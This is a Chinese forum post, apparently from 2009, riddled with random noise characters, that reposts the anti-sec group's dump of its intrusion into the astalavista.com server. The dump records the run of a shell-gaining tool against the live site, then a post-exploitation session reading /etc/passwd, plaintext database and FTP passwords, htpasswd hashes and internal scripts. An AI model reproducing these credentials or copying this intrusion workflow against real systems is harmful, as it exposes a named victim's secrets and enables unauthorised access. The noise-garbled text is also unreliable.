里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。2 [# K, s/ ~$ Z4 A6 ~. E! H; X. w
) j1 v6 @3 y! N( e; d) @; O; N& m* l
[root@front3 ~]# curl -I litespeedtech.com
7 M5 J7 c5 e1 J- L, m! L$ qHTTP/1.1 200 OK! \6 r+ G3 S: G( {# }4 {
Date: Fri, 05 Jun 2009 22:54:51 GMT
y% C, b9 e# G/ MServer: LiteSpeed
5 ]; h8 l% M; J( [9 D7 X3 F0 W
5 Y U! G7 |( E2 j* V另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-4 v$ [* e- C2 w! w
3 Q! g' Z9 A7 M) @2 F有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
& A N4 A3 a8 b7 a% W/ G! o
' W. X3 \) a. \/ e9 V) J3 m; E- B7 A, \% z% {. G4 w% `; m6 h
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ 1 P) P2 o- B* ?
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \1 z# R8 q! Y! R9 D- y
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
% j H& P1 O) r; W9 ^\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /% }( j1 w3 D, r8 r+ |% A* y
\/ \/ \/ \/ \/ \/ \/9 g. j+ E1 Y& x0 H
The Hacking & Security Community
: b7 ^5 x" \' d9 \ f[+] Founded in 1997 by a hacker computer enthusiast
% f+ c5 A6 A% x I/ [8 W% {[-] Exposed in 2009 by anti-sec group
. ^" A. F) q' z9 w) c# S. E' e1 n! p" f3 d
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:3 M% k2 N- |* y& I3 I0 L6 U$ a
>> 03. Who’s behind the site?* x, e" d* `, a% ?4 c4 A3 y! Z
>>
' ]0 m& p- b( N& K2 b. b>> A team of security and IT professionals, and a countless number of contributors from all over the world.
! |- P: I, Q# P+ `& N& s* I" T
7 a1 k! n n- k& c& M>> 05. Is it true that the site is visited by script-kiddies and warez fans only?9 @# N. S( x# ~3 D+ f' M9 l( y3 e
>>
4 ~- X8 g8 |1 n: S" \2 K>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
/ m6 H5 ^- B2 u5 [/ j, dmilitary institutions.* E5 ?/ v* ~% Z) j+ c
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.% w4 [ ?9 ? ^6 I* L2 v0 c! o
$ p B- ?5 K- ~$ I) D5 ^/ k TWhy has Astalavista been targeted?
3 b$ k, J( S% N \1 J
# H$ d1 p& H) ]. S& s( JOther than the fact that they are not doing any of this for the “community” but5 ~. l/ V/ i# s: a& o& I! O0 H
for the money, they spread exploits for kids, claim to be a security community1 D4 V; r; i1 B" {( Q- j( w$ L
(with no real sense of security on their own servers), and they charge you $6.66
b) U4 z8 ?$ X$ o: v- Kper months to access a dead forum with a directory filled with public releases
; S! T3 S: {1 B G: @8 X$ ?1 s+ K' sand outdated / broken services.
2 c$ S7 {7 f" I4 x/ X. p2 Q( O
* {8 y# ]( D% ]! U! @We wanted to see how good that “team of security and IT professionals” really is.+ c; t- t* Q. `# @, l
8 S0 p0 n7 M- E4 C3 e. b* p$ M
Let’s begin.
9 N* r( L r2 q" i5 x2 L& P; j b q; C( U# R* w4 b
anti-sec:~# ./g0tshell astalavista.com -p 80% D% k% r1 K, }& I5 ?5 d
[+] Connecting to astalavista.com:80
7 `/ O7 V f! a) Z' _[+] Grabbing banner…: d8 Q& n1 \0 Z$ N, ?: q
LiteSpeed
- L1 C. q1 w0 V# x0 T[+] Injecting shellcode…
+ X r8 G& }+ J( G[-] Wait for it
9 F* @$ c$ p4 B) ?# D, }! P2 c7 F3 B7 v) _$ F* @
[~] We g0tshell
8 a2 W& m5 N: ^, ^8 Guname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux6 Q% d) A2 {. d4 |
ID: uid=100(apache) gid=500(apache) groups=500(apache)+ u& d6 |, Y2 R9 o# }- J
/ v7 J: V, _8 Q/ a. o' e5 O0 ish-3.2$ cat /etc/passwd6 B6 K: D) P/ g
root:x:0:0:root:/root:/bin/bash7 ]% H) A1 M* Z/ U6 F. G
bin:x:1:1:bin:/bin:/sbin/nologin, q8 h L Z& m" G6 o1 c
daemon:x:2:2:daemon:/sbin:/sbin/nologin
, q- N2 D1 V8 Hadm:x:3:4:adm:/var/adm:/sbin/nologin5 I; a2 N- r( D6 F4 ?; L6 {% @* {
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
" y4 e* A& T7 L7 I6 j3 u, Psync:x:5:0:sync:/sbin:/bin/sync
+ H) ]6 H* r% X5 X- o9 `9 [shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
~0 }# J0 _) o0 q* x% Shalt:x:7:0:halt:/sbin:/sbin/halt
! b$ F1 P; l5 R, C! z# J1 Dmail:x:8:12:mail:/var/spool/mail:/sbin/nologin. j, a* M1 S0 y& _: z
news:x:9:13:news:/etc/news:* e0 s5 f+ r* _1 ^; `0 g/ k
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin: ]3 s4 t3 U* \* `3 i7 V. v# ?
operator:x:11:0 perator:/root:/sbin/nologin' s; R$ D$ S8 d+ T$ p/ j
games:x:12:100:games:/usr/games:/sbin/nologin
) Z/ k7 Z$ ?+ Z; lgopher:x:13:30:gopher:/var/gopher:/sbin/nologin
% G4 ?( t+ I" Sftp:x:14:50:FTP User:/var/ftp:/sbin/nologin( p" G# Q/ [2 b0 S5 W* v" z( H9 ?
nobody:x:99:99:Nobody:/:/sbin/nologin$ }8 c! c' K; `* M5 n# O" O
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
: f0 c5 L( r/ T+ wdbus:x:81:81:System message bus:/:/sbin/nologin- u. S) \1 D: h/ R. l4 x* e
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin1 h2 b2 a4 f* I6 w
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin5 M6 p- F* e$ h$ w
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin# f8 C- Q, d. c; S
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
+ t9 O( Y7 C, vhaldaemon:x:68:68:HAL daemon:/:/sbin/nologin
T, M n- [. g9 d- ?* X& `1 m* orpc:x:32:32 ortmapper RPC user:/:/sbin/nologin. \# E$ i2 o7 z5 O/ U+ i$ b& \' a6 K
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin4 c- J6 J# z Y# m& k
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin0 o( q- B% r$ Y# I$ N4 h
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
6 J7 ~+ E& L0 _; z# xpcap:x:77:77::/var/arpwatch:/sbin/nologin5 u4 Y1 y$ Y* g2 d( Z4 l
named:x:25:25:Named:/var/named:/sbin/nologin
- q& f/ R* S5 U- r8 X* t# T- E' Eapache:x:100:500::/var/www:/bin/false# V$ {0 { F0 E) G, `2 N
diradmin:x:101:101::/usr/local/directadmin:/bin/bash/ s! W! s" w q; W: R6 ~
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash1 T K3 X& z' G+ d) }7 ]
webapps:x:500:501::/var/www/html:/bin/bash a& Y# f+ {! M$ {2 \% ^
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
* [& N- J$ g2 y; i- j" @admin:x:501:502::/home/admin:/bin/bash
- K9 t, y- E) `- [5 b) P, T& ojon:x:502:503::/home/jon:/bin/bash, E- U( z! H3 d& X+ ^8 e: M$ k
com:x:503:504::/home/com:/bin/bash" G5 P$ ~ r0 M% X+ E% u
ntp:x:38:38::/etc/ntp:/sbin/nologin6 G7 P: F+ \# q, B
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin% I" K* T/ g) D
astanet:x:504:505::/home/astanet:/bin/bash+ _( K$ c* w* o; L+ C
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
: R/ Y6 B( ]* I+ cavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
8 ?5 x% F& _+ V; ]: N: W) [) z$ H
0 V1 G! R+ G, J1 i- x- y3 S) [sh-3.2$ cat /etc/hosts0 |. Z7 F# i8 I' J2 m4 z
# Do not remove the following line, or various programs
4 \) W, L' N; J3 @4 x# ?+ l: E# that require network functionality will fail.
& Y1 ?0 t% y+ @5 }; j. {127.0.0.1 localhost.localdomain localhost
' c8 e7 E* I8 d. q::1 localhost6.localdomain6 localhost6+ n2 S0 W0 c$ y+ B7 z: T
80.74.154.172 asta1.astalavistaserver.com
5 N! p6 n/ x- d6 ?9 b
9 ?4 K( L# f/ C# n% l& b" T2 m1 [, Esh-3.2$ pwd
" d8 ~4 s1 r# \7 @0 A: K. }/home/com/public_html
, b; ^8 N+ T/ J* Q- S8 F+ G
5 l0 U M2 L. s& Y8 G ]& h8 ush-3.2$ ls -la; O6 h9 ?8 Z k
total 18460
- Q# h) n5 N' f" ]drwxr-xr-x 30 com apache 4096 May 28 17:06 .
9 B; @, s2 K( y# u& F+ kdrwx–x–x 11 com com 4096 Jun 25 2008 ..
: T* l' }/ F% e, E8 ^ @drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin) ~+ o3 ?7 f' w
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
# H/ x# f" t6 udrwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin3 f5 m/ r% @/ L8 F3 O$ @1 _
drwxrwxrwx 2 com com 4096 May 19 00:50 config
$ C- c0 H& \' k% Cdrwxr-xr-x 2 com com 4096 Mar 20 11:05 core) G1 a! n4 S) U! j4 ]! g* B, C
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
m5 F4 p' k/ wdrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing; C; ?% A& S, c1 s& ^ ~. r4 J
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo. ~# e2 g. N" x2 G8 V$ {* ]
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
1 l$ `$ L; Y* W7 R-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
) ~+ [( q7 e: {8 l8 `- A+ Kdrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
( b7 N5 F' V; N8 [drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
, F" J+ |. o. A" s2 r-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
+ O) a' M# D2 G5 h! y& Tdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed' C4 K. ?3 p4 L d7 q" O0 E. M
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
+ O, C- ?9 }: o3 ?-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
/ }. n k* d2 \ z& d-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak/ {1 o( \* t9 j4 d; { ?6 W
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
2 T, j) m- r6 F9 q2 ?4 f" adrwxrwxrwx 14 com com 4096 Feb 2 19:29 images) q# K$ b$ ~, Z# g. t
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php$ }. l0 W0 K2 J; V/ ]
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer7 _* M: Z7 l6 S
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang; ~4 f* s |! x G9 L
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib$ _2 M8 k. a" |6 B8 w) E) m! c
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media. ^$ L3 X. M H0 ?- L
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
1 h9 `- q; |8 V4 T' wdrwxr-xr-x 34 com com 4096 May 28 16:30 modules4 o- M$ ?2 S: {% _. O% N$ K
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
8 Q& _1 o8 W( Bdrwxrwxr-x 22 com com 4096 May 28 17:06 _new* \* e: }& D8 I- G6 f4 S- {
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old1 \, s: Y3 `. ~3 i
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
2 w2 W9 r4 H- ydrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy) l: h+ T1 M* {! \5 z [$ P
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt. o% H d1 u8 J. l& m) B3 W
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml& \( B# H3 v$ ?: |3 m
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
# m+ n. F: ~! @7 t5 |drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes2 V2 @) t$ z p4 a. K5 y
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
$ L. [4 v; `2 [+ ldrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam. H6 L- A/ f0 a6 L& e. ^
C% ]; G+ F; |6 I( o6 k' Y) n! W3 w
sh-3.2$ head -20 index.php7 j T2 l+ t; C7 S/ O+ S
<?php+ Z6 k8 n! ?0 X8 [& R2 p! P4 E, r/ p
8 |2 P6 Q3 t" s) e6 Z
/**
0 i* @0 G. C; `* The main page for the CMS4 q8 B9 |3 \7 `; ^" T2 i/ ]
* @copyright CONTREXX CMS - COMVATION AG" b1 M* H Q4 {& @
* @author Comvation Development Team
7 c7 S+ C6 i% u8 w0 h \ d* @version v1.0.9.10.1 stable/ ]7 `3 _& G& e0 L$ W) U. \8 @% @/ E
* @package contrexx( F/ u- B/ B' ]: @; e
* @subpackage core
0 v: `, X7 a. x* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
, ]9 u# S2 g' G* R4 t7 o* @since v0.0.0.0
$ s( h- L9 c" b9 y* @todo Capitalize all class names in project
! W6 H6 t- o; y, \' S# H* @uses /config/configuration.php
3 v$ P0 q: w5 E/ {; \* @uses /config/settings.php) d9 i) ~8 O/ _
* @uses /config/version.php
9 Q+ s) Y, b4 P; b! ?/ Y* @uses /core/API.php7 V$ `% |+ _+ {
* @uses /core_modules/cache/index.class.php. G' ?+ Y( z/ o& d
* @uses /core/error.class.php ?7 F% o; P" _( | D* b6 a* B
* @uses /core_modules/banner/index.class.php
- s9 J1 P* a7 I& E% \* @uses /core_modules/contact/index.class.php6 v( x% O2 d5 n N4 r+ X3 y% a9 u
% q% V+ n$ G! |% I9 m) O
sh-3.2$ cd config/
6 E8 R; B0 }: \- Zsh-3.2$ ls -la# b3 o2 H8 l/ c) n! o3 p
total 32# m- t4 U+ k- o) Q2 J1 t
drwxrwxrwx 2 com com 4096 May 19 00:50 .
1 |6 H3 I3 S F7 Q: Ddrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
. w1 U2 [$ a: _. H8 I-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
% @+ y1 y: J! n2 L-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
0 A) W( T8 W4 i-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
- c3 L# q; `% T3 X-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
3 r: H; t+ L `* n7 I
" U: j7 j* N$ Z) u& q$ ?sh-3.2$ cat configuration.php0 L; c' M- X4 e0 ]- ?' I
[snip]0 ?, |$ r- D1 \' Z8 g3 F
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
2 ?3 a+ l, v0 Y1 X* p1 F6 H$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name' o. l7 U1 l0 K5 h( ?2 Y$ W
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix- k2 |3 H9 {4 i N6 d
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username* \" e2 ?( e/ ?: ]' s# `/ A
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password% f* y9 Z3 `1 C! n$ P5 x& T# \' W
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
1 t1 l: d% L N/ P0 P% ]6 {$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
c% H' R1 v& U0 L3 p[snip]
4 \4 Y' ?: N+ S$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
% Z$ H6 L, V* Z. c* c* V7 N$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode6 X1 i" F: Q I% A% M
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
) L9 @5 ^6 y1 }' I& H$_FTPCONFIG['port'] = 21; // Ftp remote port9 G) H4 R3 }% D6 v' D' U- U& b e
$_FTPCONFIG['username'] = ‘链接标记[email protected]’; // Ftp login username7 E1 b: D# `8 ^7 L+ m7 b) ]
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
: I3 I* S" ^5 y/ n5 Q3 }. }$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
6 _% y8 Z, x( ^2 b- j U, R6 x0 [8 a4 b
sh-3.2$ cd ..1 h, X" f: w* [3 n9 J
sh-3.2$ cd dvd/
" u3 J- k, \7 n# D) X, Ush-3.2$ ls -la
* S$ Y3 R- W" m; }1 l ntotal 2913780
% f; F# E1 S) e3 b: o' k& @: jdrwxr-xr-x 2 com com 4096 Sep 9 2008 .
4 `! w& D q# H/ V+ G" ydrwxr-xr-x 30 com apache 4096 May 28 17:06 ..8 q+ E6 u& {1 @- z
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
& }) y. A# v8 b: J-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
- h) Q# W# V. y: f( H-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar( j8 ^; Z) C* d/ x: M( G
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
3 ?/ N" O# B' i- ]% i1 |. J ^' W1 b# w: e4 l. |# e
sh-3.2$ cat .htaccess& }# k( h0 T0 B% e! q& F
authType Basic0 V7 [) m' T% R" o$ Z' Z3 m
authName DVD9 l. X' I5 D4 ]% n
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd/ G4 \" Q1 ^. O2 M
require valid-user. _$ C% T% u+ ]& I$ ~, g
2 o5 ~' L0 ^" d2 @' q" z! Wsh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd! ?, c: c! l/ r" l; c' g% r
DVDdownload:CRD8cuY6.MPT6
: K4 v. }7 Z ~1 Z; s& x+ h9 m1 rDVDdownload2:CR8a36.wluFMg
" d" D- \( i& P o+ k! V1 c3 H) r# o7 ^% d! R
sh-3.2$ cat test.php
: {8 b: j" w5 F8 E<?php
- q% J# u9 m4 S* B+ _3 \6 b$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;' m" p6 U. T1 e, l. P) W9 I* n9 F
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
7 C8 @' V8 d( a, Eecho $url;0 x; w5 a- A' z9 ?
?>
- W; J; m- b5 L$ L! ~& @( W" K! E2 u3 c5 X/ ]/ A) C6 j* H/ N
sh-3.2$ cd modifications/2 D/ {. d5 u B! b
sh-3.2$ ls -la- e0 a1 U: |7 O6 X) V; v
total 32
1 @, {% ?2 h4 j7 c) fdrwxr-xr-x 8 com com 4096 May 11 12:48 .
- H, g; k5 Z2 z( o; qdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
) F. h* l8 @. X1 B) f# ?( P: vdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng g) v5 S( V7 U$ D
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
) z6 V3 S' a E7 g G# g& |' N! Edrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools3 ~9 M% N2 _% ]8 F3 [
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
2 `$ p3 a& d* V) B( j( G8 K3 x/ ~drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
/ H# w. a+ Q' N/ C/ o3 ~drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp- {* x. g, p }
4 g+ ?! {# z5 g3 e" y
sh-3.2$ ls -R! h4 ]3 e; p+ L/ X; `' V* ^
.:
9 f4 [! H( @: s. K- O- Vcom_avtng cronjobs onlinetools pjirc search _tmp
' y) L/ |! c' a" N: V9 A6 ~) ~$ K5 z1 c$ a3 r
./com_avtng:
1 |; F! v8 D3 K' E: T6 O1 ^avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts& l; I! |- K1 i( z2 z+ E
+ k: v& M* U$ r./com_avtng/scripts:
# G' h5 e Z* Bpopunder.js
" z# v! p% _' ^$ b- i5 R* D9 z# B0 z; _1 f; s0 W; d0 u
./cronjobs:- z9 D/ X; W# E) A4 F- V/ g* L
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp# M3 B6 i, q6 `
. T" t$ ?1 ~; r8 j9 @
./cronjobs/tmp:
W. m( y7 D& V4 E# H% B/ |contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv; c7 _( y2 V/ S
8 e8 c/ z& }' R/ L# k./onlinetools:
, H% `6 m! H, w+ }/ r6 y# q$ {index.php2 b( P9 l2 I6 @2 e% ?
* |2 | ]+ [7 W7 W3 T./pjirc:6 n3 \$ l3 p- ]' N0 N6 s
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
! h# E! a# y% j t; B# U4 Q3 PAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt% Y8 z0 q5 s, @' e
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd; U: _# I$ M' A$ y) i: _% f5 o
9 {7 ^3 r2 H: r% b J./pjirc/img:0 P3 H5 E: B6 R+ \5 `
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif4 ^' V: t+ m% c6 h u% r
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif ) |* c/ E3 I, t9 \5 z( B4 A+ I
verre-eau.gif2 M: I9 n4 ^4 e) |! w X2 R4 x
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif 9 `$ c, E0 N. V$ b0 W7 k7 g! `7 y
verre-vin.gif
: @7 V) A5 D& Y, rballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
* p# U4 k$ `$ ]$ b, ubiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif. a3 r3 o( ] p% K
, {7 v: u, g7 g6 s0 z2 A; T4 E/ u./pjirc/snd:
. T& S. e# ]) K. V: abell2.au ding.au
* P# J. ]. \8 c1 V4 w' q9 G: c( m# }% _4 d0 p! g# H9 S
./search:
% ~1 O/ P: \2 ~searchEngines.php search.php
2 k' o0 I7 {" g0 |- \( m+ S
/ V7 r, c' k2 m# b/ _9 n( J./_tmp:. m" e% Y8 m7 T8 M3 u
defaultPorts.php defaultPorts.txt
9 a* j; W* `( Y. F( B
Y6 `) D7 k# |sh-3.2$ cd cronjobs/
: {$ V. a! ^* I9 N# gsh-3.2$ cat exploits.php* b, B# ^/ u' u
[snip]
$ m8 i7 Q+ \! y- b& q$categories = array();
0 t' x$ O0 {3 m' x3 c$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
( j3 Y* H" c' B( R2 i$expolits = file($milw0rmFile); m' l* Z) ~, v0 c$ m
$comExploits = array();0 P2 n2 u9 h! M# m; o
[snip]5 \, }; y, f! n5 e: d8 q
// manage data$ r& O9 S+ V( P, A4 G j
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
' H) V1 |- R2 n& u% K1 H
! @* J7 b2 U0 o! b: M" M2 I // get path and title+ G% A1 Q- M+ P% s1 q7 q1 n; k
$expolits[$x] = trim($expolits[$x]);0 O( f9 F! I: V
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
" _% I% B/ d& K( }% }# A( y $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
u. e4 l5 [9 ]( }. w: x; m
/ ?# ^; y% R4 Q5 K. T, e- B. ?4 o // check if file exists
: d( A' g0 h- e) A! | if (file_exists($path)) {9 \5 ^0 A! b, B) w5 ~: p
+ Z7 S9 t& ?5 }6 [2 `- q
$text = file_get_contents($path);
) Y! c; y2 p% V; a& b1 l$ C& \
4 ^$ p; V1 h* A6 m$ u( C5 } // get content and date
% F6 Y" X+ u6 n7 j; K+ \) m6 P //$text = htmlspecialchars($text, ENT_QUOTES);
2 }% N4 E, o0 j4 R $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));% }( n3 Q8 ^# @5 E. K
if ($tmptext != ”) {
, M! r/ t) h3 }( r6 y $text = $tmptext;0 N3 Y: a0 L, E/ C; S
} else {8 ?+ g4 Q6 t3 R- v5 R
$text = addslashes(htmlentities($text, ENT_QUOTES));4 t; E. C( F- n1 _% Y% z
}
2 Y3 L w' \- O9 C0 h* ~ $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));- ~. Y+ E2 g$ h/ O# E9 G. |) I
$tmp = explode('-', $date);; ~- n7 F; g4 U6 J0 s% G) Q5 C
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
0 f7 Z9 o8 O/ X; `8 U1 P3 \. t $cat = getCategory ($path);8 V! G) `* B$ p6 \8 M/ e* G1 p! X
$ext = pathinfo(basename($path));
* W7 n. j5 b7 j1 o1 F $ext = $ext['extension'];
6 h) I: ~! t4 P N( ` $qStr = ”* T2 [5 B6 s* l) Z* a' N& X: ?
SELECT `id`
+ z/ z# R9 m9 R FROM `contrexx_module_exploits`
$ B; m h9 n% n; S WHERE `title` = ‘” . $title . “‘( y7 D+ ], J4 J M
AND `date` = ‘” . $date . “‘
: Y A8 A, @3 y( P: d8 i “;# v3 @4 [. W+ y
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;" s6 y: F9 s% @+ K! h `6 f" j3 G
$q = $_objDB->query($qStr);/ `" [* o4 X# {2 u- L
# T, x5 D+ j$ M F6 h; q8 r if ($q->numRows() == 0) {# ^: p, n j3 x) h9 I
% ~/ u$ u# `' S4 j8 |4 S
// prepare array0 A+ U( N& l3 t% F# f) _+ k* K" K- |
$comExploits[$x]['date'] = $date;8 ^: x% W- q3 L4 s7 }! l
$comExploits[$x]['title'] = $title;
0 \$ c7 U9 S+ X $comExploits[$x]['author'] = ‘milw0rm’;$ }. ~4 o- U! w9 c! q
$comExploits[$x]['text'] = $text;
! e- K1 Y* M C6 ?! f7 C ?7 k $comExploits[$x]['source'] = $ext;! C/ }' s" G/ Q# i! n% f5 ~4 W
$comExploits[$x]['url1'] = ”;
( q- X/ g1 |, x! x$ C $comExploits[$x]['url2'] = ”;* l) s' K: B5 h
$comExploits[$x]['catid'] = $cat;
" H, S( e: v; h. r3 j+ k+ h" ` $comExploits[$x]['lang'] = ‘2′;
2 @' x1 [& i3 |& ?$ g $comExploits[$x]['userid'] = ‘12′;
) B7 {1 K0 S4 u4 l, C0 ~ $comExploits[$x]['startdate'] = ‘0000-00-00′;
- m/ e. l# f: M" |: z $comExploits[$x]['enddate'] = ‘0000-00-00′;
( I) A& {! @4 I7 z! m' N; l $comExploits[$x]['status'] = ‘1′;% G. W! x0 B% N/ t- q2 E
$comExploits[$x]['changelog'] = $date;- c! V7 J' w7 v
5 j9 w$ E2 j7 F# E! X* }3 x3 t
}
' q5 m& t2 q+ g' y" h3 }[snip]
. v: x- K% N9 [* Z' L8 }9 t $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>' k4 k8 ]' ]+ x- C
<rss version=”2.0″>8 @) v) K' K5 E1 h4 Y( v
<channel>1 m: G) }! ]& v$ \' m! x7 g
<title>ASTALAVISTA.com - Exploits</title>
